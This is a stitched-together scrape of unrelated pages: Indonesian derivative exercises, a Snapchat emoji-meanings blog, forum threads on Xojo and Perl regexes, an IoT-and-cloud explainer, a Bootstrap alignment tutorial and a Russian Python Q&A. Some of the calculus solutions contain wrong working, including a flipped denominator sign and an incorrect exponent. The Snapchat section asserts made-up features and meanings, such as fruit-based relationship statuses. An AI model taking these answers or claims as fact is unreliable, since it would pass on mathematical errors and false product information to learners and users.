\\ \\ &= 3x^6 + 21x^4 + 2x^4 + 14x^2 + x^3 + 7x \\ \\ &= 3x^6 + 23x^4 + x^3 + 14x^2 + 7x \\ \\ &= 18x^5 + 92x^3 + 3x^2 + 28x + 7 \\ \\ \end{align} $$ $$ \begin{align} \text{2. } \ y &= (x^3 + 3x^2) (4x^2 + 2) \hspace{100cm} \\ \\ &= 4x^5 + 2x^3 + 12x^4 + 6x^2 \\ \\ &= 4x^5 + 12x^4 + 2x^3 + 6x^2 \\ \\ &= 20x^4 + 48x^3 + 6x^2 + 12x \end{align} $$ $$ \begin{align} \text{3. } \ y = \frac{1}{3x^2 + 1}& \hspace{100cm} \\ \\ \text{Misalkan : } \ u &= 1; \ u' = 0 \\ \\ v &= 3x^2 + 1; \ v' = 6x \\ \\ \text{Maka, } \\ \\ \frac{dy}{dx} &= \frac{u'v - uv'}{v^2} \\ \\ &= \frac{ 0(3x^2 + 1)-1(6x) }{ (3x^2 + 1)^2 } \\ \\ &= \frac{ -6x }{ (3x^2 + 1)^2 } \end{align} $$ $$ \begin{align} \text{4. } \ y = \frac{2}{5x^2 - 1}& \hspace{100cm} \\ \\ \text{Misalkan : } \ u &= 2; \ u' = 0 \\ \\ v &= 5x^2 - 1; \ v' = 10x \\ \\ \text{Maka, } \\ \\ \frac{dy}{dx} &= \frac{u'v - uv'}{v^2} \\ \\ &= \frac{ 0(5x^2 - 1)-2(10x) }{ (5x^2 - 1)^2 } \\ \\ &= \frac{ -20x }{ (5x^2 + 1)^2 } \end{align} $$ $$ \begin{align} \text{5. } \ y = \frac{1}{4x^2 - 3x + 9}& \hspace{100cm} \\ \\ \text{Misalkan : } \ u &= 1; \ u' = 0 \\ \\ v &= 4x^2 - 3x + 9; \ v' = 8x - 3 \\ \\ \text{Maka, } \\ \\ \frac{dy}{dx} &= \frac{u'v - uv'}{v^2} \\ \\ &= \frac{ -1 (8x-3) }{ (4x^2 - 3x + 9)^2 } \\ \\ &= \frac{ -8x+3 }{ (4x^2 - 3x + 9)^2 } \end{align} $$ $$ \begin{align} \text{6. } \ y = \frac{x-1}{x+1}& \hspace{100cm} \\ \\ \text{Misalkan : } \ u &= x-1; \ u' = 1 \\ \\ v &= x+1; \ v' = 1 \\ \\ \text{Maka, } \\ \\ \frac{dy}{dx} &= \frac{u'v - uv'}{v^2} \\ \\ &= \frac{ 1(x+1) - (x-1)(1) }{ (x+1)^2 } \\ \\ &= \frac{ x+1 - x+1 }{ (x+1)^2 } \\ \\ &= \frac{2}{(x+1)^2} \end{align} $$ $$ \begin{align} \text{7. } \ y = \frac{2x^2 - 3x + 1}{2x + 1}& \hspace{100cm} \\ \\ \text{Misalkan : } \ u &= 2x^2 - 3x + 1; \ u' = 4x - 3 \\ \\ v &= 2x + 1; \ v' = 2 \\ \\ \text{Maka, } \\ \\ \frac{dy}{dx} &= \frac{u'v - uv'}{v^2} \\ \\ &= \frac{ ( 4x-3 )( 2x+1 ) - ( 2x^2 - 3x + 1 )(2) }{ (2x+1)^2 } \\ \\ &= \frac{ ( 8x^2 + 4x - 6x - 3 - 4x^2 + 6x -2 ) }{ (2x+1)^2 } \\ \\ &= \frac{ 4x^2 + 4x - 5 }{ (2x+1)^2 } \end{align} $$ Menentukan \( f'' (x) \) untuk soal-soal berikut : $$ \begin{align} \text{1. } \ f(x) &= \sqrt[5]{x^2} + \frac{1}{ \sqrt{x} } \hspace{100cm} \\ \\ &= x^{\frac{2}{5}} + x^{-\frac{1}{2}} \\ \\ f'(x) &= \frac{2}{5}x^{ - \frac{3}{2} } + - \frac{1}{2}x^{ - \frac{3}{2} } \\ \\ &= \frac{2}{5}x^{ - \frac{3}{2} } - \frac{1}{2}x^{ - \frac{3}{2} } \\ \\ f''(x) &= - \frac{6}{25}x^{ - \frac{8}{5} } + \frac{3}{4}x^{ -\frac{5}{2} } \end{align} $$ $$ \begin{align} \text{2. } \ f(x) &= \sqrt{x} \left( 3x + \frac{1}{3x} \right) \left( 3x - \frac{1}{3x} \right) \hspace{100cm} \\ \\ &= \left( 3x^{\frac{3}{2}} + \frac{1}{3}x^{-\frac{1}{2}} \right) \left( 3x - \frac{1}{3}x^{-1} \right) \\ \\ &= 9x^{ \frac{5}{2} } - x^{\frac{1}{2}} + x^{\frac{1}{2}} - \frac{1}{9}x^{ -\frac{3}{2} } \\ \\ &= 9x^{ \frac{5}{2} } - \frac{1}{9}x^{ -\frac{3}{2} } \\ \\ f'(x) &= \frac{45}{2}x^{ \frac{3}{2} } + \frac{3}{18}x^{-\frac{5}{2}} \\ \\ f''(x) &= \frac{135}{4}x^{\frac{1}{2}} - \frac{15}{36}x^{ -\frac{7}{2} } \end{align} $$ $$ \begin{align} \text{3. } \ f(x) &= (5x^2 - 1) (x^2 + 4x -2) \hspace{100cm} \\ \\ &= 5x^4 + 20x^3 - 10x^2 - x^2 - 4x + 2 \\ \\ &= 5x^4 + 20x^3 - 11x^2 - 4x + 2 \\ \\ f'(x) &= 20x^3 + 60x^2 - 22x - 4 \\ \\ f''(x) &= 60x^2 + 120x - 22 \end{align} $$   Share this
__label__pos
1
Snapchat Emojis Meaning Snapchat is a very fun social media platform that allows you to share your life’s best moments, whether they are with your friends, family or just you travelling around the world. But, using Snapchat and getting to know the basics is quite challenging for new users as Snapchat has quite different from other social media apps such as Instagram. Even if you are a veteran Snapchat user, you still might be missing out to know some of its hidden features and easter eggs. It is not so hard to figure out that the Snapchat emoji next to score is basically your Zodiac Sign. But, one certain feature that most people wonder about is why the emojis besides a friends name keeps changing? Do you know those emojis have a significant meaning or you believe it is just a normal emoji that Snapchat is randomly showing? Well, if you believe that, you still have a lot to figure out. Hence if you also wonder about those Snapchat emblems and wonder what their actual meanings are, stick to this article and read it till the end as we are aiming to make you a Snapchat master. Give it a read and clear out all your Snapchat doubts about emojis. What Are Snapchat Emojis? Snapchat is unique when compared to any other social media platform. While other platforms might be tracking your details and activity as well, Snapchat does not hide it from you. As you send a snap to your friends on Snapchat, it takes a proper track of your messaging habits and filters out a list of your best friends. Snapchat starts to figure out the people you share your snaps with and the people who send you snaps. As a result, following up on the Snapchat emoji chart, it assigns one and places it beside your friend’s name. These Snapchat emojis represent your level of interaction with them, and there are different emojis available that go with different conditions. That’s why not everyone on your friend’s list has the same emoji along with their name. It’s not just because of you, but the interaction and response that you are getting from the other party that also affects the emoji shown. Even there are certain emojis that are associated with celebs or verified people on Snapchat. For instance, if you ever think about What does the crown mean on Snapchat? It represents Kylie Jenner, and you can call it her signature emoji on Snapchat as well. While most people do wonder What does the Unicorn emoji mean on Snapchat? The simple answer is that it signifies a bisexual woman who loves to get intimate with an already existing couple of a heterosexual male and a bisexual female. What does the Emojis besides your friend’s name mean? yellow snapchat emoji 1. Yellow Heart 💛 If you see a Yellow Heart emoji appearing beside any of your friend’s names, it signifies that you send most of your snaps to that particular friend and you have a great friendship. red snapchat emoji 2. Red Heart ❤️ If you can maintain the streaks with your friend that already has a Yellow heart emoji beside the name. After a couple of weeks, the Yellow Heart Emoji will eventually turn into a Red Heart emoji that signifies two of you are BFFs. two pink hearts snapchat emoji 3. Two Pink Hearts 💕 Another level of friendship is when the two pink hearts emoji starts to appear. It all works in a cycle, as the Yellow Heart comes first, then a Red Heart, and when you maintain to keep that friend on top of your best friend’s list, he/she becomes your Super BFF, and the emoji turns into a Two Pink Hearts emoji. You can’t achieve the Two Pink Hearts emoji with someone in one go; it takes time to build a strong relationship, at least two months, according to Snapchat. smile face snapchat emoji 4. Smile Face 😊 Since Snapchat personalizes a list of your top 10 friends, a Smile Face Emoji appears besides those friends who are a part of that list, but not beside the number one friends. Obviously, that’s someone special, and Snapchat has something better to showcase for that one friend of yours. Baby Face Snapchat Emoji 5. Baby Face 👶 Most people wonder What does the babyface mean on Snapchat? Because it’s unique and we don’t see it that often. Whenever you add a new friend on Snapchat begins chatting, Snapchat shows a Baby Face Emoji considering he/she like the new member of your Snapchat family. Although the emoji won’t last for long there, knowing why it’s, there is just a good piece of knowledge. Sunglass Face Snapchat Emoji 6. Sunglass Face 😎 As everyone on Snapchat gets their own personalized lists of Best Friends. There are chances that someone is in your Best Friends list and someone else’s Best Friend list as well. In that case, if two people have mutual Best Friend(s), a Sunglass Face will show up beside their name. Grimacing Face Snapchat Emoji 7. Grimacing Face 😬 If you see a Grimacing Face beside any of your friend’s names on Snapchat, it is a clear indication that two of you have the same number one Best Friend. Don’t be over-possessive; it’s just Snapchat.   Smirking Face Snapchat Emoji 8. Smirking Face 😏 The Smirking Face emoji on Snapchat signifies that you are in another person’s top friends, while they are not in your list on top 10 friends. In other words, your top 10 friend’s list on Snapchat does not include that person. But, on their list of top friends, you are there. Fire Snapchat Emoji 9. Fire 🔥 Meaning to this emoji is super-simple and clear that you are on fire! Not literally, but in terms of sharing snaps with your friends. If you are aware of making streaks on Snapchat, Fire Emoji is used for that purpose. 100 Snapchat Emoji 10. 100 💯 As we just discussed the Fire Emoji, it indicates your current Snapstreak with your friends. If the streak count reaches 100, the corresponding emoji will start to appear beside the Fire Emoji. However, the emoji will be there for 24 hours only since it will change to 101 the next day, only if you don’t forget to send a snap. That will be sad if you lose it after 100 as you will have to begin from the starting once again. Hourglass Snapchat Emoji 11. Hourglass You shouldn’t be seeing this emoji at all if you love your streaks on Snapchat. As you might already know that you get 24 hours to send a snap for maintaining a streak. If you forget to send the streak and the 24-hour window is about to end, the Fire emoji will turn into Hourglass emoji which indicates that only a few hours are left before you can try to save your streaks. Want to know how long does the hourglass timer Last? Check this article. Sparkles Snapchat Emoji 12. Sparkles If you are chatting with a group of friends on Snapchat, Sparkles emoji will be appearing, which makes it easier to identify the group members on the chat list. Don’t confuse this one with other emojis as Snapchat Star emoji meanings are different. Also read: How to Make a Shortcut on Snapchat for Group of Friends Gold Star Snapchat Emoji 13. Gold Star 🌟 The Golden star emoji on Snapchat meaning is quite clear and straight-forward. If you and any of your other friends on Snapchat replays a mutual friend’s snap in the last 24 hours, the Golden Star Emoji will let you know about that. Birthday Cake Snapchat Emoji 14. Birthday Cake 🎂 This emoji is a no-brainer as Snapchat has records of everyone that consists of their personal data like the Birthdate. So, as a gesture of goodwill, Snapchat also sends you birthday wishes and also tells your other friends about your birthday by showing the Birthday Cake emoji. Thus, if you see it beside someone’s name on your list, don’t forget to wish them a Happy Birthday! Relationship Emojis on Snapchat Most Snapchat users who have been using the app for a long time, still don’t know that you can set your relationship status. Yes, this option is also there, and with a slight twist, all thanks to the Snapchat emblems and other Fruit emoji Snapchat icons. Thus, if you don’t actually know the meaning of these emojis, it might be hard for you to figure out someone else’s relations status. 1. Red Circle 🔴 A red circle on someone’s Relationship status states that they are not ready for a long-term relationship, but is open to all the propositions. 2. Blue Circle 🔵 The Blue Circle is a clear indication that the person is single, so that might be a good chance for you to talk and tell them if you like. But, a blue circle does not mean they are looking out for a relationship. 3. Cherry 🍒 People on Snapchat who set Cherry emoji as their Relationship Status, it means they are in a healthy relationship with someone, and everything’s going well.   4. Pineapple 🍍 Out of all the Fruit emoji Snapchat emojis, the Pineapple on Snapchat is as same as “It’s complicated!” on Facebook. Even we can’t explain this complicated thing to you. 5. Lemon 🍋 A person who is currently in a relationship with someone, but things are not working out and wants to be out of it; a Lemon emoji will appear for such Relationship status. 6. Strawberry 🍓 What does Strawberry mean on Snapchat? Here’s your answer. You will be seeing this one a lot as it appears when someone is looking for the right person but is not able to find them for a long time. Maybe you can talk to them and make this Strawberry Snapchat emoji turn into a Cherry emoji for them. 7. Apple 🍎 If a person is engaged and is going to marry soon, the Apple emoji will let you know that. 8. Banana 🍌 The Banana emoji on Snapchat signifies that the person is married. 9. Avocado 🥑 Most people wonder What does avocado mean on Snapchat? Well, an Avocado Snapchat emoji appears when someone thinks they are the better-half in a relationship. 10. Chestnut 🌰 If a person is in a long-term relationship and wants to marry them as well happily, but is not even engaged yet, the chestnut emoji is the perfect one to showcase that. These were some of the most popular fruit emoji on Snapchat that are being used to symbolize various relationship statuses. If you wonder, why there is no Peach fruit on the list and then what does the peach emoji mean on Snapchat? As of now, it has no significant meaning rather than people use it to symbolize buttocks, bum, or any other word you can use to describe the area, as the peach emoji looks like it.  Snapchat Status Icons 1. Red Arrow Icon Red Arrow Snapchat Icon The Red arrow icons on Snapchat are used to show that you have sent a snap to your friend that does not contain audio. Or basically, it’s just an image. Until your friend sees your snap, it will appear to be as a solid Red-coloured arrow. And, if the snap has been seen, it will turn into a hollow arrow with Red boundary. 2. Purple Arrow Icon Red Arrow Snapchat Icon Similar to the Red Arrow, the Purple arrow appears when you successfully send a snap with audio (basically a video) to your friends on Snapchat. If your friend has not seen the snap, it will appear as a solid purple arrow and will turn into a hollow purple arrow after your friend has seen the snap. 3. Blue Arrow Icon Red Arrow Snapchat Icon The Blue color arrow icon appears when you send a chat message to your Snapchat friends. Once your friend sees the message, it will appear as a hollow arrow with a blue-colored boundary. 4. Red Square Icon Red Square Snapchat Icon If a friend sends a snap to you, and the icon appears to be a Red square. It means that the snap does not contain any audio. It can either be a video or image, excluding audio. 5. Purple Square Icon Red Square Snapchat Icon Contrary to the Red Square, if a Purple Square appears when you receive a snap from your friends, it means that the snap includes audio. In other words, it’s simply going to be video. 6. Blue Square Icon Blue Square Snapchat Icon Unlike the Red square or Purple Square, the Blue Square icon looks more like a message icon. And, you can easily figure out that your friend has sent you a normal text message or shared some media file in the personal message window. 7. Interlaced Arrow Icon Interlaced Arrow Snapchat Icon Interlaced Arrow icons of all the three colors mean that your friend has seen whatever you have sent, either an image, a chat message, or a video. Your friend has taken a screenshot of that. How to Customize Your Friend Emojis? Although the currently Snapchat-implemented Friend emojis are quite perfect and are quite easy to understand. There might be some people who don’t like them that much and want to change the emojis shown beside their friend’s name. You’ll be glad to know that you can completely customize the Friend’s emoji and set whatever you want to see on your Snapchat. However, it is not going to change anything on your friend’s side. This change of emojis will only appear on your Snapchat. So, let’s learn how to customize your Friend Emojis on Snapchat. Step 1. First of all, launch the Snapchat app. Step 2. On the top-left corner, there will be your Bitmoji icon, tap on it. Step 3. Once you tap on your Bitmoji icon, it will open the Profile Menu. Step 4, Here, tap on the Settings icon which is present at the top-right corner. Step 5. Inside the Settings Window, scroll down till you find the Additional Services tab, then tap on the Customise Emojis button. Step 6. The Snapchat Emoji chart will appear here; you can tap on any emoji and change it to whatever you like. After you make these changes, the Snapchat Friend emoji changes will appear only on your Snapchat. It will remain to be set as default for other people. Conclusion As you can see by reading this article, Snapchat is a unique social media platform. Not because it has some complications, but the way it has used the common emojis to make your user-experience better is what we believe every other social media platform should do. Not only does it look good, but the emojis on Snapchat has various meanings that make it quite interesting to use. We assume we have covered most people’s doubts regarding the Snapchat emojis. In case you think we have left out something to mention, or you have some queries regarding Snapchat. Feel free to ask us in the comments section and don’t forget to share this article with your friends who are new to Snapchat, it’ll be a great help for them as well. Similar Posts Leave a Reply Your email address will not be published.
__label__pos
0.545622
Creating new variable type ? I put this in OS X since I found this in MacOSLib. For a recent project, I had to use CFURL to call a Cocoa declare, but that particular type does not exist natively in Xojo. However, I noticed that MacOSLib had the type CFURL, and even uses it just like a native type as in : dim base as CFURL = me.BaseURL Being able to create new types like that which seem to be usable like other types is a fascinating possibility that could vastly simplify coding. I tried to understand how this works, but the way it is built into MacOSLib is so arborescent, with internal calls to hundreds of methods and properties, I was unable to really grasp the essential. I see that CFURL is a global class within the CoreFoundation Module, but I got lost trying to understand how a class can take a value directly like a variable, possibly with implicit conversion. I will appreciate any possible insight. TIA Read docs about Operator_Convert. That is nice but it does not seem to allow creating a new type beyond existing ones. It’s what is used in MacOSLib. If you look at the declare itself the parameter will be a Ptr. Using Operator_Convert, the object, in this case CFURL, returns the pointer to the represented object created in declares. That’s all that is happening, there is no other magic going on behind the scenes. So although it looks like there is a new type created, it is simply the object returning its pointer. Every time a declare is used with an object instance in MacOSLib, Operator_Convert returns the pointer. In this case the same effect would be accomplished if instead of using just the instance you used “instance.id” which also returns the pointer. Hopefully that makes sense. Assuming ‘me’ is a CFURL I don’t see any Operator_Convert going on. CFURL.BaseURL is a computed property that returns a CFURL which is stored in variable base. CFURL is a class. CFType is its super class. CFType has a property called “Handle”, which is of type CFTypeRef structure. CFTypeRef is a structure, which consists only of one field “value”, which is of type Ptr. Thank you. I understand better, now.
__label__pos
0.734465
Howdy, Stranger! It looks like you're new here. If you want to get involved, click one of these buttons! Categories Extracting a word from a line in an array EmilyBEmilyB Member Posts: 1 Hello. I am new to Perl programming and I have what may be a simple question! I need to write code to remove a number from a line in a file. The number is never in exactly the same spot and they are not the same length but it always has a word right in front. For example: dogs Dachshund X732i AnimalNum:[b]Q21097[/b] ens2 trip1 cats kitty z898 AnimalNum:[b]IS2193[/b] arg32 bfn1 The portion I'm looking for is in bold. I have code that reads in the file into an array and then it searches for say Dachshund or kitty and finds the line that has that entry and then I need it to give me the AnimalNum. [code] foreach my $line (@animal_list){ if ($line =~ /$var/){ #var1 = Dachsund or kitty if ($line =~ /$var2/){ #var2 = AnimalNum print OUTPUTF "$line "; #now I need to find the AnimalNum that is in $line } [/code] How would I search for the word AnimalNum and then take the ID number directly after it? Comments • JonathanJonathan Member Posts: 2,914 Hi, You need to use parens to write a capture. Something like: [code]$line =~ /AnimalNum: (S+)/; my $number = $1;[/code] Jonathan ### for(74,117,115,116){$::a.=chr};(($_.='qwertyui')&& (tr/yuiqwert/her anot/))for($::b);for($::c){$_.=$^X; /(p.{2}l)/;$_=$1}$::b=~/(..)$/;print("$::a$::b $::c hack$1."); Sign In or Register to comment.
__label__pos
0.796667
The Internet of Things and the Cloud Back in the 1970s, it was popular for businesses to rent time using big, mainframe computer systems. These systems were extremely large and expensive, so it didn’t make sense financially for businesses to own the computing power themselves. Instead, they were owned by large corporations, government agencies, and universities. Microprocessor technology allowed for great reductions in size and expense, leading to the advent of the personal computer, which exploded in popularity in the 1980s. Suddenly, businesses could (and did) bring computation in-house. However, as high-speed connections have become widespread, the trend has reversed: businesses are once again renting computing power from other organizations. But why is that? Instead of buying expensive hardware for storage and processing in-house, it’s easy to rent it for cheap in the cloud. The cloud is a huge, interconnected network of powerful servers that performs services for businesses and for people. The largest cloud providers now in the US are Amazon, Google, and Microsoft, who have huge farms of servers that they rent to businesses as part of their cloud services. For businesses that have variable needs (most of the time they don’t need much computing, but every now and then they need a lot), this is cost effective because they can simply pay as-needed. When it comes to people, we use these cloud services all of the time. You might store your files in Google Drive instead of on your personal computer. Google Drive, of course, uses Google’s cloud services. Or you might listen to songs on Spotify instead of downloading the songs to your computer or phone. Spotify uses Amazon’s cloud services. Generally, something that happens “in The Cloud” is any activity that takes place over an internet connection instead of on the device itself. The Internet of Things and the Cloud Because activities like storage and data processing take place in the cloud rather than on the device itself, this has had significant implications for IoT. Many IoT systems make use of large numbers of sensors to collect data and then make intelligent decisions (want to know how an IoT system actually works?). Using the cloud is important for aggregating data and drawing insights from that data. For instance, a smart agriculture company would be able to compare soil moisture sensors from Kansas and Colorado after planting the same seeds. Without the cloud, comparing data across wider areas is much more difficult. Using the cloud also allows for high scalability. When you have millions of sensors, putting large amounts of computational power on each sensor would be extremely expensive and energy intensive. Instead, data can be passed to the cloud from all these sensors and processed there in aggregate. For much of IoT, the head (or rather, the brain) of the system is in the cloud. Sensors and devices collect data and perform actions, but the processing/commanding/analytics (aka the “smart” stuff), typically happens in the cloud. So is the cloud necessary for IoT? Technically, the answer is no. The data processing and commanding could take place locally rather than in the cloud via an internet connection. Known as “fog computing” or “edge computing”, this actually makes a lot of sense for some IoT applications. However, there are substantial benefits to be had using the cloud for many IoT applications. Choosing not to use the cloud would significantly slow the industry due to the increased costs. Importantly, cost and scalability aren’t the only factors. This brings us to a more difficult question… Is the cloud desirable for IoT? So far we’ve only been discussing the benefits of using the cloud for IoT. Let’s briefly summarize them before exploring the concerns: • Decreased costs, both upfront and infrastructure   • Pay-as-needed for storage/computing   • High system scalability and availability   • Increased lifespan of battery-powered sensors/devices   • Ability to aggregate large amounts of data   • Anything with an internet connection can become “smart”   • However there are legitimate concerns with cloud usage:   Data ownership. When you store data in a company’s cloud service, do you own the data or does the cloud provider? This can be hugely important for IoT applications involving personal data such as healthcare or smart homes. Potential crashes. If connection is interrupted or the cloud service itself crashes, the IoT application won’t work. Short-term inoperability might not be a big deal for certain IoT applications, like smart agriculture, but it could be devastating for others. You don’t want applications involving health or safety crashing for even a few seconds, let alone a few hours. Latency. It takes time for data to be sent to the cloud and commands to return to the device. In certain IoT applications, these milliseconds can be critical such as in health and safety. A good example is Autonomous Vehicles. If a crash is imminent, you don’t want to have to wait for the car to talk to the cloud before making a decision to swerve out of the way. So when we ask if the cloud is desirable for IoT: it depends. The Internet of Things is a broad field and includes an incredible variety of applications. There is no one-size-fits-all solution so IoT companies need to consider their specific application when deciding whether the cloud makes sense for them. That’s actually one of the reasons why my company Leverage exists to help companies who want to build an IoT solution navigate the entire process.   Edited by Ken Briodagh   Source: The Internet of Things and the Cloud
__label__pos
0.619859
  Signup/Sign In How to Vertical Align a DIV in Bootstrap? The vertical Alignment property is used to align the elements vertically on the webpage. The vertical alignment utilities are used to set the vertical alignment of an inline, inline-block, inline-table, and table cells element. It cannot be used to vertically align block elements like div. For vertical aligning div elements, we need to used flexbox utilities. Let's understand with the examples. Using flexbox alignment utilities To align the div element vertically, use the align-items class. We can vertically align items to the center, start, baseline, end, or stretch. Example: Vertical-align div elements In this example, we will vertically align div items using the align-items class. <!DOCTYPE html> <html lang="en"> <head> <title>Bootstrap Example</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" > <script src="https://cdn.jsdelivr.net/npm/@popperjs/[email protected]/dist/umd/popper.min.js" ></script> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.min.js"></script> </head> <body> <div class="container"> <h2>Vertical align div items</h2> <div class="d-flex align-items-start bg-info" style="height: 80px;"> <div class="p-2 border border-light">Flex item 1</div> </div> <br> <div class="d-flex align-items-end bg-info" style="height: 100px;"> <div class="p-2 border border-light">Flex item 1</div> </div> <br> <div class="d-flex align-items-center bg-info" style ="height: 80px;"> <div class="p-2 border border-light">Flex item 1</div> </div> <br> <div class="d-flex align-items-baseline bg-info" style="height: 80px;"> <div class="p-2 border border-light">Flex item 1</div> </div> <br> <div class="d-flex align-items-stretch bg-info" style="height: 80px;"> <div class="p-2 border border-light">Flex item 1</div> </div> </div> </body> </html> Output Here is the output of the above program. vertical align div elements Example: Add responsive variation to vertically align div items We can also add responsive variation to vertically align div elements. For example, .align-items-md-center centers the div in the medium viewport. Here in this example, we have used a responsive variation of align-items. Conclusion Here, we learned to vertical-align div in Bootstrap 5. The vertical alignment utilities cannot be used to align div items. So, we need to use an align-items class from flexbox. Responsive variations are also available for div alignment. About the author:
__label__pos
0.944484
Идиома Python для возврата первого элемента или None Я уверен, что есть более простой способ сделать это, что просто не происходит для меня. Я вызываю кучу методов, которые возвращают список. Список может быть пустым. Если список не пуст, я хочу вернуть первый элемент; в противном случае я хочу вернуть None. Этот код работает: my_list = get_list() if len(my_list) > 0: return my_list[0] return None Мне кажется, что для этого должна быть простая однострочная идиома, но для жизни я не могу думать об этом. Есть? Edit: Причина, по которой я ищу однострочное выражение здесь, заключается не в том, что мне нравится невероятно сложный код, а потому, что мне приходится писать много кода, например: x = get_first_list() if x: # do something with x[0] # inevitably forget the [0] part, and have a bug to fix y = get_second_list() if y: # do something with y[0] # inevitably forget the [0] part AGAIN, and have another bug to fix То, что я хотел бы делать, конечно, может быть выполнено с помощью функции (и, вероятно, будет): def first_item(list_or_none): if list_or_none: return list_or_none[0] x = first_item(get_first_list()) if x: # do something with x y = first_item(get_second_list()) if y: # do something with y Я разместил вопрос, потому что меня часто удивляют, что могут делать простые выражения в Python, и я думал, что писать функцию было глупо, если бы было простое выражение, которое могло бы сделать трюк. Но, видя эти ответы, кажется, что функция является простым решением. +149 источник поделиться 23 ответа Python 2.6 + next(iter(your_list or []), None) Python 2.4 def get_first(iterable, default=None): if iterable: for item in iterable: return item return default Пример: x = get_first(get_first_list()) if x: ... y = get_first(get_second_list()) if y: ... Другим вариантом является встроенная функция выше: for x in get_first_list() or []: # process x break # process at most one item for y in get_second_list() or []: # process y break Чтобы избежать break, вы можете написать: for x in yield_first(get_first_list()): x # process x for y in yield_first(get_second_list()): y # process y Где: def yield_first(iterable): for item in iterable or []: yield item return +68 источник Лучший способ: a = get_list() return a[0] if a else None Вы также можете сделать это в одной строке, но программисту гораздо труднее прочитать: return (get_list()[:1] or [None])[0] +158 источник (get_list() or [None])[0] Это должно работать. BTW Я не использовал переменную list, потому что она перезаписывает встроенную функцию list(). Изменить: у меня была немного более простая, но неправильная версия здесь раньше. +44 источник Самый идиоматический способ python - использовать next() на итераторе, так как список итерируется. точно так же, как @J.F.Sebastian вставить комментарий 13 декабря 2011 года. next(iter(the_list), None) Возвращает None, если the_list пуст. см. next() Python 2.6+ или если вы точно знаете the_list не пусто: iter(the_list).next() см. iterator.next() Python 2.2+ +27 источник Решение OP находится почти там, есть всего несколько вещей, чтобы сделать его более Pythonic. Во-первых, нет необходимости получать длину списка. Пустые списки в Python оценивают значение False в чеке if. Просто скажите if list: Кроме того, очень плохой идеей присваивается переменным, которые перекрываются с зарезервированными словами. "Список" - это зарезервированное слово в Python. Итак, измените это на some_list = get_list() if some_list: На самом деле важным моментом является то, что здесь много недостатков: все функции/методы Python возвращают None по умолчанию. Попробуйте следующее. def does_nothing(): pass foo = does_nothing() print foo Если вам не нужно возвращать None для прекращения функции раньше, нет необходимости явно возвращать None. Вкратце, просто верните первую запись, если она существует. some_list = get_list() if some_list: return list[0] И, наконец, возможно, это было подразумевается, но только для того, чтобы быть явным (потому что явный лучше, чем неявный), вы не должны иметь свою функцию получить список из другой функции; просто передайте его в качестве параметра. Итак, конечным результатом будет def get_first_item(some_list): if some_list: return list[0] my_list = get_list() first_item = get_first_item(my_list) Как я уже сказал, OP был почти там, и только несколько касаний придают ему аромат Python, который вы ищете. +9 источник Если вы обнаружите, что пытаетесь перенести первое (или Нет) из понимания списка, вы можете переключиться на генератор, чтобы сделать это, как: next((x for x in blah if cond), None) Pro: работает, если blah не индексируется. Con: это незнакомый синтаксис. Это полезно при взломе и фильтрации файлов в ipython. +7 источник for item in get_list(): return item +3 источник Для этого есть еще одна возможность. return None if not get_list() else get_list()[0] Преимущество: Этот метод обрабатывает случай, когда get_list - None, без использования try/except или assign. Насколько мне известно, ни одна из вышеперечисленных реализаций не может справиться с этой возможностью. крушения: get_list() вызывается дважды, совершенно ненужно, особенно если список длинный и/или создан при вызове функции. По правде говоря, это больше "Pythonic", на мой взгляд, для обеспечения кода, который читабельен, чем для создания однострочного интерфейса только потому, что вы можете:) Я должен признать, что я виноват во многих случаях ненужного уплотнения Python код просто потому, что меня так впечатлило, насколько мал я могу сделать сложную функцию:) Изменить: Как уже упоминалось пользователем "hasen j", условное выражение выше является новым в Python 2.5, как описано здесь: https://docs.python.org/whatsnew/2.5.html#pep-308. Спасибо, hasen! +2 источник Идиома Python для возврата первого элемента или None? Самый питоновский подход - это то, что продемонстрировал самый верный ответ, и это было первое, что приходило мне в голову, когда я читал вопрос. Здесь, как использовать его, сначала, если возможно пустой список передается в функцию: def get_first(l): return l[0] if l else None И если список возвращается из функции get_list: l = get_list() return l[0] if l else None Другие способы продемонстрировали это здесь, с пояснениями for Когда я начал думать о умных способах сделать это, это вторая вещь, о которой я думал: for item in get_list(): return item Это предполагает, что функция заканчивается здесь, неявно возвращая None, если get_list возвращает пустой список. Ниже явный код в точности эквивалентен: for item in get_list(): return item return None if some_list Было также предложено следующее (я исправил неправильное имя переменной), который также использует неявный None. Это было бы предпочтительнее вышеизложенного, поскольку он использует логическую проверку вместо итерации, которая может не произойти. Это должно быть проще сразу понять, что происходит. Но если мы пишем для удобства чтения и обслуживания, мы также должны добавить явный return None в конец: some_list = get_list() if some_list: return some_list[0] slice or [None] и выберите нулевой индекс Этот вопрос также находится в самом верном ответе: return (get_list()[:1] or [None])[0] Срез не нужен и создает дополнительный список из одного элемента в памяти. Следующее должно быть более результативным. Чтобы объяснить, or возвращает второй элемент, если первый False в булевом контексте, поэтому, если get_list возвращает пустой список, выражение, содержащееся в круглых скобках, вернет список с "None", который затем доступ к индексу 0: return (get_list() or [None])[0] Следующий использует тот факт, что и возвращает второй элемент, если первый True в булевом контексте, и поскольку он дважды ссылается на my_list, это не лучше, чем тройное выражение (и технически не однострочный ): my_list = get_list() return (my_list and my_list[0]) or None next Тогда мы имеем следующее умное использование встроенных next и iter return next(iter(get_list()), None) Чтобы объяснить, iter возвращает итератор с помощью метода .next. (.__next__ в Python 3.) Затем встроенный next вызывает этот метод .next, и если итератор исчерпан, возвращает значение по умолчанию, которое мы даем, None. избыточное тернарное выражение (a if b else c) и обратная связь Было предложено нижеследующее, но наоборот было бы предпочтительным, так как логика обычно лучше понимается в положительном, а не отрицательном. Поскольку get_list вызывается дважды, если результат каким-то образом не замечен, это будет плохо работать: return None if not get_list() else get_list()[0] Лучше обратное: return get_list()[0] if get_list() else None Еще лучше, используйте локальную переменную, так что get_list вызывается только один раз, и у вас есть рекомендуемое решение Pythonic, которое обсуждалось вначале: l = get_list() return l[0] if l else None +2 источник Честно говоря, я не думаю, что есть более совершенная идиома: вы понятны и кратки - не нужно ничего "лучше". Возможно, но это действительно вопрос вкуса, вы можете изменить if len(list) > 0: на if list: - пустой список всегда будет оценивать значение False. В соответствующей заметке, Python не Perl (не предназначен для каламбуров!), вам не нужно получать самый крутой код. На самом деле, худший код, который я видел в Python, тоже был очень классным:-) и совершенно не поддающийся оценке. Кстати, большинство решений, которые я видел здесь, не учитывают, когда список [0] оценивается как False 